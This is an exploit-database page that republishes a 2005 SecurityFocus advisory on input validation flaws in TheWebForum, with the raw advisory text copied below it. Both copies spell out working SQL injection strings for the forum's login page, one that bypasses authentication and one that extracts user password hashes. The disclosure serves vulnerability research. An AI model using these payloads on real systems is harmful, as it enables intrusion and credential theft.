header-logo
Suggest Exploit
vendor:
TheWebForum
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple Input Validation Vulnerabilities
89
CWE
Product Name: TheWebForum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

TheWebForum Multiple Input Validation Vulnerabilities

TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials and allow an attacker to control how the site is rendered to the user. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. Authentication bypass example (SQL Injection): http://www.example.com/twf/login.php User Name: a' or 'a'='a'/* Password: anypassword Get user's password hash example (SQL Injection): http://www.example.com/twf/login.php User Name: a' union select N,password, 3 from users/* User name will contain password's hash of user with ID=N

Mitigation:

Input validation should be used to detect unauthorized input before it is processed by the application. Input validation should be applied on both syntactical and semantic level.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16161/info

TheWebForum is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials and allow an attacker to control how the site is rendered to the user. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. 

Authentication bypass example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword

Get user's password hash example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' union select N,password, 3 from users/*
User name will contain password's hash of user with ID=N

Navigation

Suggest Exploit

Services By CQR